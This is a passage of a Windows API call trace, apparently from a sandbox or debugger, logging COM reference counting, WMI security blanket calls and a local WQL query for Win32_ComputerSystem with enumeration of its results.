	[0201.805] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86e820, pProxy=0x1cc3aad8, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0201.805] WbemLocator:IUnknown:Release (This=0x1b86e820) returned 0x1
	[0201.805] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aad8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86e860) returned 0x0
	[0201.805] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aad8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86e820) returned 0x0
	[0201.805] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86e820, pProxy=0x1cc3aad8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0201.805] WbemLocator:IUnknown:Release (This=0x1b86e820) returned 0x2
	[0201.805] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x1
	[0201.805] CoTaskMemFree (pv=0x1b885c80) 
	[0201.806] WbemLocator:IUnknown:Release (This=0x1cc31c20) returned 0x0
	[0201.806] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aad8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86e860) returned 0x0
	[0201.806] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0201.807] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0201.809] WbemLocator:IUnknown:AddRef (This=0x1b86e860) returned 0x3
	[0201.809] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0201.809] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86e748) returned 0x0
	[0201.809] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e748, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.809] WbemLocator:IUnknown:Release (This=0x1b86e748) returned 0x3
	[0201.809] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0201.809] WbemLocator:IUnknown:AddRef (This=0x1b86e860) returned 0x4
	[0201.809] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86e830) returned 0x0
	[0201.809] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x4
	[0201.809] WbemLocator:IRpcOptions:Query (in: This=0x1b86e830, pPrx=0x1b86e860, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0201.810] WbemLocator:IUnknown:Release (This=0x1b86e830) returned 0x3
	[0201.810] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x2
	[0201.810] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0201.810] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0201.810] WbemLocator:IUnknown:AddRef (This=0x1b86e860) returned 0x3
	[0201.810] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc3aad8) returned 0x0
	[0201.810] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x3
	[0201.810] WbemLocator:IUnknown:Release (This=0x1cc3aad8) returned 0x2
	[0201.811] WbemLocator:IUnknown:Release (This=0x1cc3aad8) returned 0x1
	[0201.811] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0201.811] WbemLocator:IUnknown:AddRef (This=0x1b86e860) returned 0x2
	[0201.811] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86e860) returned 0x0
	[0201.811] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x2
	[0201.811] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x1
	[0201.811] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0201.811] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0201.811] WbemLocator:IUnknown:AddRef (This=0x1b86e860) returned 0x2
	[0201.812] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e860, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc3aad8) returned 0x0
	[0201.812] WbemLocator:IUnknown:Release (This=0x1b86e860) returned 0x2
	[0201.812] WbemLocator:IUnknown:AddRef (This=0x1cc3aad8) returned 0x3
	[0201.812] IWbemServices:ExecQuery (in: This=0x1cc3aad8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc36188) returned 0x0
	[0201.840] IUnknown:QueryInterface (in: This=0x1cc36188, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc36190) returned 0x0
	[0201.840] IClientSecurity:QueryBlanket (in: This=0x1cc36190, pProxy=0x1cc36188, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0201.840] IUnknown:Release (This=0x1cc36190) returned 0x1
	[0201.840] IUnknown:QueryInterface (in: This=0x1cc36188, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86e6e0) returned 0x0
	[0201.840] IUnknown:QueryInterface (in: This=0x1cc36188, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc36190) returned 0x0
	[0201.840] IClientSecurity:SetBlanket (This=0x1cc36190, pProxy=0x1cc36188, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0201.842] IUnknown:Release (This=0x1cc36190) returned 0x2
	[0201.842] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x1
	[0201.842] CoTaskMemFree (pv=0x1b885dd0) 
	[0201.843] IUnknown:QueryInterface (in: This=0x1cc36188, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86e6e0) returned 0x0
	[0201.843] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
	[0201.843] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0201.844] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x3
	[0201.844] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0201.844] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86e5c8) returned 0x0
	[0201.845] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e5c8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.845] WbemLocator:IUnknown:Release (This=0x1b86e5c8) returned 0x3
	[0201.845] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0201.845] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x4
	[0201.845] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86e6b0) returned 0x0
	[0201.845] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x4
	[0201.845] WbemLocator:IRpcOptions:Query (in: This=0x1b86e6b0, pPrx=0x1b86e6e0, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0201.845] WbemLocator:IUnknown:Release (This=0x1b86e6b0) returned 0x3
	[0201.845] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x2
	[0201.846] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0201.846] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0201.846] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x3
	[0201.846] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc36188) returned 0x0
	[0201.846] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x3
	[0201.846] IUnknown:Release (This=0x1cc36188) returned 0x2
	[0201.846] IUnknown:Release (This=0x1cc36188) returned 0x1
	[0201.847] WbemLocator:IUnknown:Release (This=0x1cc3aad8) returned 0x2
	[0201.847] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0201.847] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0201.847] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.847] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0201.847] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0201.847] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x2
	[0201.847] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc36188) returned 0x0
	[0201.847] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x2
	[0201.847] IUnknown:AddRef (This=0x1cc36188) returned 0x3
	[0201.847] IEnumWbemClassObject:Clone (in: This=0x1cc36188, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc3ddb8) returned 0x0
	[0201.849] IUnknown:QueryInterface (in: This=0x1cc3ddb8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc3ddc0) returned 0x0
	[0201.849] IClientSecurity:QueryBlanket (in: This=0x1cc3ddc0, pProxy=0x1cc3ddb8, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0201.849] IUnknown:Release (This=0x1cc3ddc0) returned 0x1
	[0201.849] IUnknown:QueryInterface (in: This=0x1cc3ddb8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86eb60) returned 0x0
	[0201.849] IUnknown:QueryInterface (in: This=0x1cc3ddb8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc3ddc0) returned 0x0
	[0201.849] IClientSecurity:SetBlanket (This=0x1cc3ddc0, pProxy=0x1cc3ddb8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0201.850] IUnknown:Release (This=0x1cc3ddc0) returned 0x2
	[0201.851] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x1
	[0201.851] CoTaskMemFree (pv=0x1b885cb0) 
	[0201.851] IUnknown:QueryInterface (in: This=0x1cc3ddb8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86eb60) returned 0x0
	[0201.851] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0201.851] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0201.852] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x3
	[0201.852] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0201.852] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86ea48) returned 0x0
	[0201.852] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86ea48, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.852] WbemLocator:IUnknown:Release (This=0x1b86ea48) returned 0x3
	[0201.853] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0201.853] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x4
	[0201.853] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86eb30) returned 0x0
	[0201.853] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x4
	[0201.853] WbemLocator:IRpcOptions:Query (in: This=0x1b86eb30, pPrx=0x1b86eb60, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0201.853] WbemLocator:IUnknown:Release (This=0x1b86eb30) returned 0x3
	[0201.853] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0201.854] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0201.854] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0201.854] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x3
	[0201.854] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc3ddb8) returned 0x0
	[0201.854] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x3
	[0201.854] IUnknown:Release (This=0x1cc3ddb8) returned 0x2
	[0201.854] IUnknown:Release (This=0x1cc3ddb8) returned 0x1
	[0201.854] IUnknown:Release (This=0x1cc36188) returned 0x2
	[0201.854] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0201.854] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0201.855] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x2
	[0201.855] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc3ddb8) returned 0x0
	[0201.855] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0201.855] IUnknown:AddRef (This=0x1cc3ddb8) returned 0x3
	[0201.855] IEnumWbemClassObject:Reset (This=0x1cc3ddb8) returned 0x0
	[0201.856] IUnknown:Release (This=0x1cc3ddb8) returned 0x2
	[0201.856] CoTaskMemAlloc (cb=0x8) returned 0x1b88a2f0
	[0201.856] IEnumWbemClassObject:Next (in: This=0x1cc3ddb8, lTimeout=-1, uCount=0x1, apObjects=0x1b88a2f0, puReturned=0x1c68ccb8 | out: apObjects=0x1b88a2f0*=0x1cc3de20, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0201.858] IUnknown:QueryInterface (in: This=0x1cc3de20, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc3de20) returned 0x0
	[0201.858] IUnknown:QueryInterface (in: This=0x1cc3de20, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0201.858] IUnknown:QueryInterface (in: This=0x1cc3de20, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0201.858] IUnknown:AddRef (This=0x1cc3de20) returned 0x3
	[0201.858] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0201.858] IUnknown:QueryInterface (in: This=0x1cc3de20, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc3de28) returned 0x0
	[0201.859] IMarshal:GetUnmarshalClass (in: This=0x1cc3de28, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0201.859] IUnknown:Release (This=0x1cc3de28) returned 0x3
	[0201.859] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0201.859] IUnknown:AddRef (This=0x1cc3de20) returned 0x4
	[0201.859] IUnknown:QueryInterface (in: This=0x1cc3de20, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0201.859] IUnknown:Release (This=0x1cc3de20) returned 0x3
	[0201.859] IUnknown:Release (This=0x1cc3de20) returned 0x2
	[0201.860] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0201.860] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0201.860] IUnknown:AddRef (This=0x1cc3de20) returned 0x3
	[0201.860] IUnknown:QueryInterface (in: This=0x1cc3de20, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc3de20) returned 0x0
	[0201.860] IUnknown:Release (This=0x1cc3de20) returned 0x3
	[0201.860] IUnknown:Release (This=0x1cc3de20) returned 0x2
	[0201.860] IUnknown:Release (This=0x1cc3de20) returned 0x1
	[0201.860] CoTaskMemFree (pv=0x1b88a2f0) 
	[0201.860] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0201.861] IUnknown:AddRef (This=0x1cc3de20) returned 0x2
